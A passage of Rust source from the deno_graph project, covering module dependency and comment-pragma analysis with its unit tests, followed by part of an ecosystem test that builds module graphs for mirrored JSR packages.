text_info: &SourceTextInfo,
comments: &MultiThreadedComments,
) -> ModuleInfo {
let leading_comments = match program.body().next() {
Some(item) => comments.get_leading(item.start()),
None => match program.shebang() {
Some(_) => comments.get_trailing(program.end()),
None => comments.get_leading(program.start()),
},
};
// Get trailing comments from the program end to extract sourceMappingURL
// which is typically at the very end of the file
let trailing_comments = comments.get_trailing(program.end());
ModuleInfo {
is_script: program.compute_is_script(),
dependencies: analyze_dependencies(program, text_info, comments),
ts_references: analyze_ts_references(text_info, leading_comments),
self_types_specifier: analyze_ts_self_types(
media_type,
text_info,
leading_comments,
),
jsx_import_source: analyze_jsx_import_source(
media_type,
text_info,
leading_comments,
),
jsx_import_source_types: analyze_jsx_import_source_types(
media_type,
text_info,
leading_comments,
),
jsdoc_imports: analyze_jsdoc_imports(media_type, text_info, comments),
source_map_url: analyze_source_map_url(text_info, trailing_comments),
}
}
pub fn analyze_sync(
&self,
specifier: &deno_ast::ModuleSpecifier,
source: Arc<str>,
media_type: MediaType,
) -> Result<ModuleInfo, ParseDiagnostic> {
let parsed_source = self.parser.parse_program(ParseOptions {
specifier,
source,
media_type,
// scope analysis is not necessary for module parsing
scope_analysis: false,
})?;
Ok(ParserModuleAnalyzer::module_info(&parsed_source))
}
}
impl Default for ParserModuleAnalyzer<'_> {
fn default() -> Self {
Self {
parser: &DefaultEsParser,
}
}
}
#[async_trait::async_trait(?Send)]
impl ModuleAnalyzer for ParserModuleAnalyzer<'_> {
async fn analyze(
&self,
specifier: &deno_ast::ModuleSpecifier,
source: Arc<str>,
media_type: MediaType,
) -> Result<ModuleInfo, JsErrorBox> {
self
.analyze_sync(specifier, source, media_type)
.map_err(JsErrorBox::from_err)
}
}
/// Helper struct for creating a single object that implements
/// `deno_graph::ModuleAnalyzer`, `deno_graph::EsParser`,
/// and `deno_graph::ParsedSourceStore`. All parses will be captured
/// to prevent them from occuring more than one time.
pub struct CapturingModuleAnalyzer {
parser: Box<dyn EsParser>,
store: Box<dyn ParsedSourceStore>,
}
impl Default for CapturingModuleAnalyzer {
fn default() -> Self {
Self::new(None, None)
}
}
impl CapturingModuleAnalyzer {
pub fn new(
parser: Option<Box<dyn EsParser>>,
store: Option<Box<dyn ParsedSourceStore>>,
) -> Self {
Self {
parser: parser.unwrap_or_else(|| Box::<DefaultEsParser>::default()),
store: store
.unwrap_or_else(|| Box::<DefaultParsedSourceStore>::default()),
}
}
pub fn as_capturing_parser(&self) -> CapturingEsParser<'_> {
CapturingEsParser::new(Some(&*self.parser), &*self.store)
}
}
#[async_trait::async_trait(?Send)]
impl ModuleAnalyzer for CapturingModuleAnalyzer {
async fn analyze(
&self,
specifier: &deno_ast::ModuleSpecifier,
source: Arc<str>,
media_type: MediaType,
) -> Result<ModuleInfo, JsErrorBox> {
let capturing_parser = self.as_capturing_parser();
let module_analyzer = ParserModuleAnalyzer::new(&capturing_parser);
module_analyzer.analyze(specifier, source, media_type).await
}
}
impl EsParser for CapturingModuleAnalyzer {
fn parse_program(
&self,
options: ParseOptions,
) -> Result<ParsedSource, ParseDiagnostic> {
let capturing_parser = self.as_capturing_parser();
capturing_parser.parse_program(options)
}
}
impl ParsedSourceStore for CapturingModuleAnalyzer {
fn set_parsed_source(
&self,
specifier: ModuleSpecifier,
parsed_source: ParsedSource,
) -> Option<ParsedSource> {
self.store.set_parsed_source(specifier, parsed_source)
}
fn get_parsed_source(
&self,
specifier: &ModuleSpecifier,
) -> Option<ParsedSource> {
self.store.get_parsed_source(specifier)
}
fn remove_parsed_source(
&self,
specifier: &ModuleSpecifier,
) -> Option<ParsedSource> {
self.store.remove_parsed_source(specifier)
}
fn get_scope_analysis_parsed_source(
&self,
specifier: &ModuleSpecifier,
) -> Option<ParsedSource> {
self.store.get_scope_analysis_parsed_source(specifier)
}
}
fn analyze_dependencies(
program: deno_ast::ProgramRef,
text_info: &SourceTextInfo,
comments: &MultiThreadedComments,
) -> Vec<DependencyDescriptor> {
let deps = analyze_program_dependencies(program, comments);
deps
.into_iter()
.map(|d| match d {
self::dep::DependencyDescriptor::Static(d) => {
DependencyDescriptor::Static(StaticDependencyDescriptor {
kind: d.kind,
types_specifier: analyze_ts_or_deno_types(
text_info,
&d.leading_comments,
),
specifier: d.specifier.to_string(),
specifier_range: PositionRange::from_source_range(
d.specifier_range,
text_info,
),
import_attributes: d.import_attributes,
is_side_effect: d.is_side_effect,
})
}
self::dep::DependencyDescriptor::Dynamic(d) => {
DependencyDescriptor::Dynamic(DynamicDependencyDescriptor {
kind: d.kind,
types_specifier: analyze_ts_or_deno_types(
text_info,
&d.leading_comments,
),
argument: match d.argument {
self::dep::DynamicArgument::String(text) => {
DynamicArgument::String(text.to_string())
}
self::dep::DynamicArgument::Template(parts) => {
DynamicArgument::Template(
parts
.into_iter()
.map(|part| match part {
self::dep::DynamicTemplatePart::String(text) => {
DynamicTemplatePart::String {
value: text.to_string(),
}
}
self::dep::DynamicTemplatePart::Expr => {
DynamicTemplatePart::Expr
}
})
.collect(),
)
}
self::dep::DynamicArgument::Expr => DynamicArgument::Expr,
},
argument_range: PositionRange::from_source_range(
d.argument_range,
text_info,
),
import_attributes: d.import_attributes,
})
}
})
.collect()
}
fn analyze_ts_references(
text_info: &SourceTextInfo,
leading_comments: Option<&Vec<deno_ast::swc::common::comments::Comment>>,
) -> Vec<TypeScriptReference> {
let mut references = Vec::new();
if let Some(c) = leading_comments {
for comment in c {
if comment.kind == CommentKind::Line
&& is_comment_triple_slash_reference(&comment.text)
{
let comment_start = comment.start();
if let Some(m) = find_path_reference(&comment.text) {
references.push(TypeScriptReference::Path(SpecifierWithRange {
text: m.as_str().to_string(),
range: comment_source_to_position_range(
comment_start,
m.range(),
text_info,
false,
),
}));
} else if let Some(m) = find_types_reference(&comment.text) {
let resolution_mode = find_resolution_mode(&comment.text)
.and_then(|m| TypeScriptTypesResolutionMode::from_str(m.as_str()));
references.push(TypeScriptReference::Types {
specifier: SpecifierWithRange {
text: m.as_str().to_string(),
range: comment_source_to_position_range(
comment_start,
m.range(),
text_info,
false,
),
},
resolution_mode,
});
}
}
}
}
references
}
fn analyze_jsx_import_source(
media_type: MediaType,
text_info: &SourceTextInfo,
leading_comments: Option<&Vec<deno_ast::swc::common::comments::Comment>>,
) -> Option<SpecifierWithRange> {
if !matches!(media_type, MediaType::Jsx | MediaType::Tsx) {
return None;
}
leading_comments.and_then(|c| {
c.iter().find_map(|c| {
if c.kind != CommentKind::Block {
return None; // invalid
}
let m = find_jsx_import_source(&c.text)?;
Some(SpecifierWithRange {
text: m.as_str().to_string(),
range: comment_source_to_position_range(
c.start(),
m.range(),
text_info,
true,
),
})
})
})
}
fn analyze_jsx_import_source_types(
media_type: MediaType,
text_info: &SourceTextInfo,
leading_comments: Option<&Vec<deno_ast::swc::common::comments::Comment>>,
) -> Option<SpecifierWithRange> {
if !matches!(media_type, MediaType::Jsx | MediaType::Tsx) {
return None;
}
leading_comments.and_then(|c| {
c.iter().find_map(|c| {
if c.kind != CommentKind::Block {
return None; // invalid
}
let m = find_jsx_import_source_types(&c.text)?;
Some(SpecifierWithRange {
text: m.as_str().to_string(),
range: comment_source_to_position_range(
c.start(),
m.range(),
text_info,
true,
),
})
})
})
}
fn analyze_ts_self_types(
media_type: MediaType,
text_info: &SourceTextInfo,
leading_comments: Option<&Vec<deno_ast::swc::common::comments::Comment>>,
) -> Option<SpecifierWithRange> {
if media_type.is_typed() {
return None;
}
leading_comments.and_then(|c| {
c.iter().find_map(|c| {
let m = find_ts_self_types(&c.text)?;
Some(SpecifierWithRange {
text: m.as_str().to_string(),
range: comment_source_to_position_range(
c.start(),
m.range(),
text_info,
false,
),
})
})
})
}
// Search source map URL from trailing comments
fn analyze_source_map_url(
text_info: &SourceTextInfo,
trailing_comments: Option<&Vec<deno_ast::swc::common::comments::Comment>>,
) -> Option<SpecifierWithRange> {
trailing_comments.and_then(|c| {
c.iter().rev().find_map(|comment| {
let source_mapping_url = find_source_mapping_url(&comment.text)?;
Some(SpecifierWithRange {
text: source_mapping_url.as_str().to_string(),
range: comment_source_to_position_range(
comment.start(),
source_mapping_url.range(),
text_info,
true,
),
})
})
})
}
/// Searches comments for any `@ts-types` or `@deno-types` compiler hints.
pub fn analyze_ts_or_deno_types(
text_info: &SourceTextInfo,
leading_comments: &[DependencyComment],
) -> Option<SpecifierWithRange> {
let comment = leading_comments.last()?;
if let Some(m) = find_ts_types(&comment.text) {
return Some(SpecifierWithRange {
text: m.as_str().to_string(),
range: comment_source_to_position_range(
comment.range.start(),
m.range(),
text_info,
false,
),
});
}
let deno_types = find_deno_types(&comment.text)?;
Some(SpecifierWithRange {
text: deno_types.text.to_string(),
range: comment_source_to_position_range(
comment.range.start(),
deno_types.range,
text_info,
deno_types.is_quoteless,
),
})
}
fn analyze_jsdoc_imports(
media_type: MediaType,
text_info: &SourceTextInfo,
comments: &MultiThreadedComments,
) -> Vec<JsDocImportInfo> {
// Analyze any JSDoc type imports
// We only analyze these on JavaScript types of modules, since they are
// ignored by TypeScript when type checking anyway and really shouldn't be
// there, but some people do strange things.
if !matches!(
media_type,
MediaType::JavaScript | MediaType::Jsx | MediaType::Mjs | MediaType::Cjs
) {
return Vec::new();
}
let mut deps = Vec::new();
for comment in comments.iter_unstable() {
if comment.kind != CommentKind::Block || !comment.text.starts_with('*') {
continue;
}
let js_docs = comment
.text
.match_indices("{")
.filter_map(|(i, _)| {
parse_jsdoc_dynamic_import(&comment.text[i..])
.ok()
.map(|(_input, jsdoc)| (i, jsdoc))
})
.chain(comment.text.match_indices("@import").filter_map(|(i, _)| {
parse_jsdoc_import_decl(&comment.text[i..])
.ok()
.map(|(_input, jsdoc)| (i, jsdoc))
}));
for (byte_index, js_doc) in js_docs {
deps.push(JsDocImportInfo {
specifier: SpecifierWithRange {
text: js_doc.specifier,
range: comment_source_to_position_range(
comment.range().start,
byte_index + js_doc.specifier_range.start
..byte_index + js_doc.specifier_range.end,
text_info,
false,
),
},
resolution_mode: js_doc.resolution_mode,
});
}
}
deps.sort_by(|a, b| a.specifier.range.start.cmp(&b.specifier.range.start));
deps
}
#[derive(Debug, Clone)]
struct JsDocImport {
specifier: String,
specifier_range: std::ops::Range<usize>,
resolution_mode: Option<TypeScriptTypesResolutionMode>,
}
fn parse_jsdoc_import_decl(input: &str) -> monch::ParseResult<'_, JsDocImport> {
use monch::*;
fn skip_named_imports(input: &str) -> monch::ParseResult<'_, ()> {
// { ... }
let (input, _) = ch('{')(input)?;
let (input, _) = monch::take_while(|c| c != '}')(input)?;
let (input, _) = ch('}')(input)?;
Ok((input, ()))
}
fn skip_namespace_import(input: &str) -> monch::ParseResult<'_, ()> {
// * as ns
let (input, _) = ch('*')(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, _) = tag("as")(input)?;
let (input, _) = whitespace(input)?;
let (input, _) = parse_ident(input)?;
Ok((input, ()))
}
fn parse_attributes(
input: &str,
) -> ParseResult<'_, Option<TypeScriptTypesResolutionMode>> {
let (input, _) = tag("with")(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, maybe_resolution_mode) =
parse_import_attribute_block_for_resolution_mode(input)?;
Ok((input, maybe_resolution_mode))
}
let initial_input = input;
let (input, _) = tag("@import")(input)?;
let (input, _) = whitespace(input)?;
let (input, _) = or3(
skip_named_imports,
terminated(skip_namespace_import, whitespace),
terminated(map(parse_ident, |_| ()), whitespace),
)(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, _) = tag("from")(input)?;
let (input, _) = skip_whitespace(input)?;
let start_specifier_input = input;
let (input, specifier) = parse_quote(input)?;
let end_specifier_input = input;
let (input, _) = skip_whitespace(input)?;
let (input, maybe_resolution_mode) = maybe(parse_attributes)(input)?;
Ok((
input,
JsDocImport {
specifier: specifier.to_string(),
specifier_range: initial_input.len() - start_specifier_input.len() + 1
..initial_input.len() - end_specifier_input.len() - 1,
resolution_mode: maybe_resolution_mode.flatten(),
},
))
}
/// Matches a JSDoc import type reference (`{import("./example.js")}`
fn parse_jsdoc_dynamic_import(
input: &str,
) -> monch::ParseResult<'_, JsDocImport> {
fn parse_second_param_obj_with_leading_comma(
input: &str,
) -> monch::ParseResult<'_, Option<TypeScriptTypesResolutionMode>> {
let (input, _) = ch(',')(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, _) = ch('{')(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, _) = tag("with")(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, _) = ch(':')(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, maybe_resolution_mode) =
parse_import_attribute_block_for_resolution_mode(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, _) = ch('}')(input)?;
Ok((input, maybe_resolution_mode))
}
// \{[^}]*import\(['"]([^'"]+)['"]\)[^}]*}"
use monch::*;
let original_input = input;
let (mut input, _) = ch('{')(input)?;
{
let original_input = input;
for (index, c) in input.char_indices() {
if c == '}' {
return ParseError::backtrace();
}
input = &original_input[index..];
if input.starts_with("import") {
break;
}
}
}
let (input, _) = tag("import")(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, _) = ch('(')(input)?;
let (input, _) = skip_whitespace(input)?;
let start_specifier_input = input;
let (input, specifier) = parse_quote(input)?;
let end_specifier_input = input;
let (input, _) = skip_whitespace(input)?;
let (input, maybe_resolution_mode) =
maybe(parse_second_param_obj_with_leading_comma)(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, _) = ch(')')(input)?;
let (input, _) = take_while(|c| c != '}')(input)?;
let (input, _) = ch('}')(input)?;
Ok((
input,
JsDocImport {
specifier: specifier.to_string(),
specifier_range: original_input.len() - start_specifier_input.len() + 1
..original_input.len() - end_specifier_input.len() - 1,
resolution_mode: maybe_resolution_mode.flatten(),
},
))
}
fn parse_import_attribute_block_for_resolution_mode(
input: &str,
) -> monch::ParseResult<'_, Option<TypeScriptTypesResolutionMode>> {
use monch::*;
map(parse_import_attribute_block, |attributes| {
attributes
.iter()
.find(|(key, _)| *key == "resolution-mode")
.and_then(|(_, value)| TypeScriptTypesResolutionMode::from_str(value))
})(input)
}
fn parse_import_attribute_block(
input: &str,
) -> monch::ParseResult<'_, Vec<(&str, &str)>> {
use monch::*;
fn parse_attribute(input: &str) -> ParseResult<'_, (&str, &str)> {
let (input, key) = or(parse_quote, parse_ident)(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, _) = ch(':')(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, value) = parse_quote(input)?;
Ok((input, (key, value)))
}
let (input, _) = ch('{')(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, attributes) = separated_list(
parse_attribute,
delimited(skip_whitespace, ch(','), skip_whitespace),
)(input)?;
let (input, _) = skip_whitespace(input)?;
let (input, _) = ch('}')(input)?;
Ok((input, attributes))
}
fn parse_ident(input: &str) -> monch::ParseResult<'_, &str> {
use monch::*;
let start_input = input;
let (input, c) = next_char(input)?;
if !c.is_alphabetic() {
return Err(monch::ParseError::Backtrace);
}
// good enough for now
let (input, _) =
take_while(|c| !c.is_whitespace() && c != ':' && c != '-')(input)?;
Ok((input, &start_input[..start_input.len() - input.len()]))
}
fn parse_quote(input: &str) -> monch::ParseResult<'_, &str> {
use monch::*;
let (input, open_char) = or(ch('"'), ch('\''))(input)?;
let (input, text) = take_while(|c| c != open_char)(input)?;
let (input, _) = ch(open_char)(input)?;
Ok((input, text))
}
fn comment_source_to_position_range(
comment_start: SourcePos,
inner_range: std::ops::Range<usize>,
text_info: &SourceTextInfo,
is_specifier_quoteless: bool,
) -> PositionRange {
// the comment text starts after the double slash or slash star, so add 2
let comment_start = comment_start + 2;
// -1 and +1 to include the quotes, but not for pragmas that don't have quotes
let padding = if is_specifier_quoteless { 0 } else { 1 };
PositionRange {
start: Position::from_source_pos(
comment_start + inner_range.start - padding,
text_info,
),
end: Position::from_source_pos(
comment_start + inner_range.end + padding,
text_info,
),
}
}
#[cfg(test)]
mod tests {
use crate::analysis::JsDocImportInfo;
use super::*;
use pretty_assertions::assert_eq;
#[test]
fn test_parse() {
let specifier =
ModuleSpecifier::parse("file:///a/test.tsx").expect("bad specifier");
let source = r#"
/// <reference path="./ref.d.ts" />
/// <reference types="./types.d.ts" />
// @jsxImportSource http://example.com/invalid
/* @jsxImportSource http://example.com/preact */
// @jsxImportSourceTypes http://example.com/invalidTypes
/* @jsxImportSourceTypes http://example.com/preactTypes */
import {
A,
B,
C,
D,
} from "https://deno.land/x/example@v1.0.0/mod.ts";
export * from "./mod.ts";
import type { Component } from "https://esm.sh/preact";
import { h, Fragment } from "https://esm.sh/preact";
// other
// @deno-types="https://deno.land/x/types/react/index.d.ts"
import React from "https://cdn.skypack.dev/react";
// @deno-types=https://deno.land/x/types/react/index.d.ts
import React2 from "https://cdn.skypack.dev/react";
// @deno-types="https://deno.land/x/types/react/index.d.ts"
// other comment first
import React3 from "https://cdn.skypack.dev/react";
const a = await import("./a.ts");
const React4 = await /* @deno-types="https://deno.land/x/types/react/index.d.ts" */ import("https://cdn.skypack.dev/react");
"#;
let parsed_source = DefaultEsParser
.parse_program(ParseOptions {
specifier: &specifier,
source: source.into(),
media_type: MediaType::Tsx,
scope_analysis: false,
})
.unwrap();
let text_info = parsed_source.text_info_lazy();
let module_info = ParserModuleAnalyzer::module_info(&parsed_source);
let dependencies = module_info.dependencies;
assert_eq!(dependencies.len(), 9);
let ts_references = module_info.ts_references;
assert_eq!(ts_references.len(), 2);
match &ts_references[0] {
TypeScriptReference::Path(specifier) => {
assert_eq!(specifier.text, "./ref.d.ts");
assert_eq!(
text_info.range_text(&specifier.range.as_source_range(text_info)),
r#""./ref.d.ts""#
);
}
TypeScriptReference::Types { .. } => panic!("expected path"),
}
match &ts_references[1] {
TypeScriptReference::Path(_) => panic!("expected types"),
TypeScriptReference::Types {
specifier,
resolution_mode: mode,
} => {
assert_eq!(*mode, None);
assert_eq!(specifier.text, "./types.d.ts");
assert_eq!(
text_info.range_text(&specifier.range.as_source_range(text_info)),
r#""./types.d.ts""#
);
}
}
let dep_deno_types = &dependencies[4]
.as_static()
.unwrap()
.types_specifier
.as_ref()
.unwrap();
assert_eq!(
dep_deno_types.text,
"https://deno.land/x/types/react/index.d.ts"
);
assert_eq!(
text_info.range_text(&dep_deno_types.range.as_source_range(text_info)),
r#""https://deno.land/x/types/react/index.d.ts""#
);
let dep_deno_types = &dependencies[5]
.as_static()
.unwrap()
.types_specifier
.as_ref()
.unwrap();
assert_eq!(
dep_deno_types.text,
"https://deno.land/x/types/react/index.d.ts"
);
assert_eq!(
text_info.range_text(&dep_deno_types.range.as_source_range(text_info)),
r#"https://deno.land/x/types/react/index.d.ts"#
);
assert!(
dependencies[6]
.as_static()
.unwrap()
.types_specifier
.is_none()
);
let dep_deno_types = &dependencies[8]
.as_dynamic()
.unwrap()
.types_specifier
.as_ref()
.unwrap();
assert_eq!(
dep_deno_types.text,
"https://deno.land/x/types/react/index.d.ts"
);
assert_eq!(
text_info.range_text(&dep_deno_types.range.as_source_range(text_info)),
r#""https://deno.land/x/types/react/index.d.ts""#
);
let jsx_import_source = module_info.jsx_import_source.unwrap();
assert_eq!(jsx_import_source.text, "http://example.com/preact");
assert_eq!(
text_info.range_text(&jsx_import_source.range.as_source_range(text_info)),
"http://example.com/preact"
);
let jsx_import_source_types = module_info.jsx_import_source_types.unwrap();
assert_eq!(
jsx_import_source_types.text,
"http://example.com/preactTypes"
);
assert_eq!(
text_info
.range_text(&jsx_import_source_types.range.as_source_range(text_info)),
"http://example.com/preactTypes"
);
assert!(module_info.self_types_specifier.is_none());
}
#[test]
fn test_parse_resolution_mode() {
let specifier =
ModuleSpecifier::parse("file:///a/test.mts").expect("bad specifier");
let source = r#"
/// <reference types="./types.d.ts" resolution-mode="require" />
/// <reference types="node" resolution-mode="import" />
/// <reference types="other" resolution-mode="asdf" />
"#;
let parsed_source = DefaultEsParser
.parse_program(ParseOptions {
specifier: &specifier,
source: source.into(),
media_type: MediaType::Mts,
scope_analysis: false,
})
.unwrap();
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/tests/ecosystem_test.rs | tests/ecosystem_test.rs | // Copyright 2018-2024 the Deno authors. MIT license.
#![allow(clippy::disallowed_methods)]
use std::collections::HashSet;
use std::io::Write as _;
use std::path::PathBuf;
use std::sync::Arc;
use deno_ast::MediaType;
use deno_ast::diagnostics::Diagnostic;
use deno_graph::BuildFastCheckTypeGraphOptions;
use deno_graph::BuildOptions;
use deno_graph::GraphKind;
use deno_graph::ModuleGraph;
use deno_graph::WorkspaceFastCheckOption;
use deno_graph::WorkspaceMember;
use deno_graph::ast::CapturingModuleAnalyzer;
use deno_graph::source::LoadResponse;
use deno_graph::source::NullFileSystem;
use deno_semver::StackString;
use deno_semver::package::PackageNv;
use file_test_runner::RunOptions;
use file_test_runner::TestResult;
use file_test_runner::collection::CollectedCategoryOrTest;
use file_test_runner::collection::CollectedTest;
use file_test_runner::collection::strategies::TestPerFileCollectionStrategy;
use futures::FutureExt;
use indexmap::IndexMap;
use serde::Deserialize;
use std::fmt::Write;
use tempfile::tempdir;
use thiserror::Error;
use url::Url;
#[derive(Debug, Clone, Deserialize)]
struct Version {
scope: String,
name: String,
version: String,
}
fn main() {
if cfg!(not(feature = "ecosystem_test")) {
return;
}
if std::fs::metadata("./tests/ecosystem/jsr_mirror").is_err() {
println!(
"skipping, ecosystem mirror not found. run `deno run -A ./tests/ecosystem/jsr_mirror.ts` to populate"
);
return;
}
// TODO: Audit that the environment access only happens in single-threaded code.
unsafe { std::env::set_var("NO_COLOR", "1") };
let versions_str = include_str!("./ecosystem/jsr_versions.json");
let versions: Vec<Version> = serde_json::from_str(versions_str).unwrap();
if std::env::var("UPDATE").as_deref() == Ok("1") {
for version in versions {
let path = PathBuf::from(format!(
"./tests/specs/ecosystem/{}/{}/{}.test",
version.scope.replace('-', "_"),
version.name.replace('-', "_"),
version.version.replace(['.', '-', '+'], "_")
));
std::fs::create_dir_all(path.parent().unwrap()).ok();
if let Ok(mut file) = std::fs::OpenOptions::new()
.create_new(true)
.write(true)
.open(path)
{
file
.write_all(
format!(
"{}/{}/{}\n-- deno.lock --\n{{}}\n===\n\n",
version.scope, version.name, version.version
)
.as_bytes(),
)
.unwrap();
}
}
}
let mut category = file_test_runner::collection::collect_tests_or_exit(
file_test_runner::collection::CollectOptions {
base: PathBuf::from("./tests/specs/ecosystem"),
strategy: Box::new(TestPerFileCollectionStrategy {
file_pattern: Some(".*\\.test$".to_owned()),
}),
filter_override: None,
},
);
let shard_index: Option<u8> = std::env::var("SHARD_INDEX")
.ok()
.map(|s| s.parse().unwrap());
let shard_count: Option<u8> = std::env::var("SHARD_COUNT")
.ok()
.map(|s| s.parse().unwrap());
if let (Some(shard_index), Some(shard_count)) = (shard_index, shard_count) {
let tests_per_shard = category.test_count() / shard_count as usize;
let mut current_shard_index = 0;
let mut tests_in_current_shard = 0;
category.children.retain_mut(|category| match category {
CollectedCategoryOrTest::Test(_) => todo!(),
CollectedCategoryOrTest::Category(category) => {
category.children.retain(|category| match category {
CollectedCategoryOrTest::Test(_) => todo!(),
CollectedCategoryOrTest::Category(category) => {
let test_count = category.test_count();
tests_in_current_shard += test_count;
let retain = current_shard_index == shard_index;
if tests_in_current_shard > tests_per_shard {
current_shard_index += 1;
tests_in_current_shard = 0;
}
retain
}
});
!category.children.is_empty()
}
});
};
file_test_runner::run_tests(
&category,
RunOptions {
parallel: std::env::var("CI").is_err(),
},
run_test,
)
}
fn run_test(test: &CollectedTest) -> TestResult {
TestResult::from_maybe_panic(|| {
let file = test.read_to_string().unwrap();
let Some((scope_name_version, rest)) = file.split_once('\n') else {
panic!("first line of test file must be scope/name/version");
};
let (scope, name_version) = scope_name_version.split_once('/').unwrap();
let (name, version) = name_version.split_once('/').unwrap();
let (lockfile_with_prefix, expected) =
rest.split_once("\n===\n\n").unwrap();
let lockfile = lockfile_with_prefix
.strip_prefix("-- deno.lock --\n")
.unwrap();
test_version(scope, name, version, &test.path, lockfile, expected)
})
}
#[derive(Debug, Clone, Deserialize)]
struct VersionMeta {
exports: IndexMap<String, String>,
}
#[derive(Debug, Clone, Deserialize, Error, deno_error::JsError)]
#[class(type)]
#[error("Unsupported scheme: {0}")]
struct UnsupportedScheme(String);
struct Loader<'a> {
scope: &'a str,
name: &'a str,
version: &'a str,
}
impl deno_graph::source::Loader for Loader<'_> {
fn load(
&self,
specifier: &deno_ast::ModuleSpecifier,
_options: deno_graph::source::LoadOptions,
) -> deno_graph::source::LoadFuture {
let res = match specifier.scheme() {
"file" => {
let specifier_str = specifier.to_string();
let specifier_str = specifier_str.trim_start_matches("file:///");
let path = format!(
"./tests/ecosystem/jsr_mirror/{}/{}/{}/{}",
self.scope, self.name, self.version, specifier_str
);
match std::fs::read_to_string(path) {
Ok(source_code) => Ok(Some(LoadResponse::Module {
content: source_code.into_bytes().into(),
maybe_headers: None,
mtime: None,
specifier: specifier.clone(),
})),
Err(err) if err.kind() == std::io::ErrorKind::NotFound => Ok(None),
Err(err) => Err(deno_graph::source::LoadError::Other(
std::sync::Arc::new(err),
)),
}
}
"data" => deno_graph::source::load_data_url(specifier)
.map_err(|e| deno_graph::source::LoadError::Other(Arc::new(e))),
"jsr" | "npm" | "node" => Ok(Some(LoadResponse::External {
specifier: specifier.clone(),
})),
_ => Err(deno_graph::source::LoadError::Other(Arc::new(
UnsupportedScheme(specifier.scheme().to_string()),
))),
};
async move { res }.boxed()
}
}
struct PassthroughJsrUrlProvider;
impl deno_graph::source::JsrUrlProvider for PassthroughJsrUrlProvider {
fn url(&self) -> &Url {
unreachable!(
"BuildOptions::passthrough_jsr_specifiers should be set to true"
)
}
fn package_url(&self, _nv: &PackageNv) -> Url {
unreachable!(
"BuildOptions::passthrough_jsr_specifiers should be set to true"
)
}
fn package_url_to_nv(&self, _url: &Url) -> Option<PackageNv> {
None
}
}
use std::path::Path;
use std::{fs, io};
fn copy_dir_all(
src: impl AsRef<Path>,
dst: impl AsRef<Path>,
) -> io::Result<()> {
fs::create_dir_all(&dst)?;
for entry in fs::read_dir(src)? {
let entry = entry?;
let ty = entry.file_type()?;
if ty.is_dir() {
copy_dir_all(entry.path(), dst.as_ref().join(entry.file_name()))?;
} else {
fs::copy(entry.path(), dst.as_ref().join(entry.file_name()))?;
}
}
Ok(())
}
#[tokio::main(flavor = "current_thread")]
async fn test_version(
scope: &str,
name: &str,
version: &str,
spec_path: &Path,
lockfile: &str,
expected: &str,
) {
let version_meta_path =
format!("./tests/ecosystem/jsr_mirror/{scope}/{name}/{version}_meta.json");
let version_meta_str = std::fs::read_to_string(version_meta_path).unwrap();
let version_meta: VersionMeta =
serde_json::from_str(&version_meta_str).unwrap();
let module_analyzer = CapturingModuleAnalyzer::default();
let mut graph = ModuleGraph::new(GraphKind::All);
let workspace_members = vec![WorkspaceMember {
base: Url::parse("file:///").unwrap(),
exports: version_meta.exports.clone(),
name: StackString::from_string(format!("@{scope}/{name}")),
version: Some(deno_semver::Version::parse_standard(version).unwrap()),
}];
let mut roots = vec![];
for (_, specifier) in &version_meta.exports {
let url = Url::parse(&format!("file:///{specifier}")).unwrap();
roots.push(url);
}
let loader = Loader {
scope,
name,
version,
};
graph
.build(
roots.clone(),
Vec::new(),
&loader,
BuildOptions {
is_dynamic: false,
skip_dynamic_deps: false,
unstable_bytes_imports: false,
unstable_text_imports: false,
module_analyzer: &module_analyzer,
module_info_cacher: Default::default(),
file_system: &NullFileSystem,
locker: None,
resolver: None,
npm_resolver: None,
reporter: None,
jsr_version_resolver: Default::default(),
jsr_url_provider: &PassthroughJsrUrlProvider,
passthrough_jsr_specifiers: true,
executor: Default::default(),
jsr_metadata_store: None,
},
)
.await;
if let Err(err) = graph.valid() {
match err {
deno_graph::ModuleGraphError::ModuleError(err) => {
match err.as_kind() {
deno_graph::ModuleErrorKind::UnsupportedMediaType {
media_type: MediaType::Cjs | MediaType::Cts,
..
} => {
// ignore, old packages with cjs and cts
return;
}
err => panic!("{}", err),
}
}
err => panic!("{}", err),
}
}
graph.build_fast_check_type_graph(BuildFastCheckTypeGraphOptions {
fast_check_cache: Default::default(),
fast_check_dts: true,
jsr_url_provider: &PassthroughJsrUrlProvider,
es_parser: Some(&module_analyzer),
resolver: None,
workspace_fast_check: WorkspaceFastCheckOption::Enabled(&workspace_members),
});
let mut fast_check_diagnostic_ranges = HashSet::new();
let mut fast_check_diagnostics = vec![];
for root in &roots {
let module = graph.get(root).unwrap();
if let Some(module) = module.js()
&& let Some(diagnostics) = module.fast_check_diagnostics()
{
for diagnostic in diagnostics {
if fast_check_diagnostic_ranges.insert(diagnostic.range()) {
fast_check_diagnostics.push(diagnostic.clone());
}
}
}
}
let mut output = if fast_check_diagnostics.is_empty() {
"== FAST CHECK EMIT PASSED ==\n".to_owned()
} else {
let mut output = "== FAST CHECK EMIT FAILED ==\n".to_owned();
for diagnostic in &fast_check_diagnostics {
writeln!(&mut output, "{}\n", diagnostic.display()).unwrap();
}
output
};
let mut new_lockfile = lockfile.to_string();
if fast_check_diagnostics.is_empty() {
let tmpdir = tempdir().unwrap();
let tmpdir_path = tmpdir.path().canonicalize().unwrap();
let tmpdir_path = if cfg!(windows) {
PathBuf::from(
tmpdir_path
.to_str()
.unwrap()
.strip_prefix("\\\\?\\")
.unwrap(),
)
} else {
tmpdir_path
};
let temp_file =
std::env::temp_dir().join(format!("{}_{}_{}.lock", scope, name, version));
std::fs::write(&temp_file, lockfile.trim()).unwrap();
let lockfile_path = temp_file.canonicalize().unwrap();
let base_path =
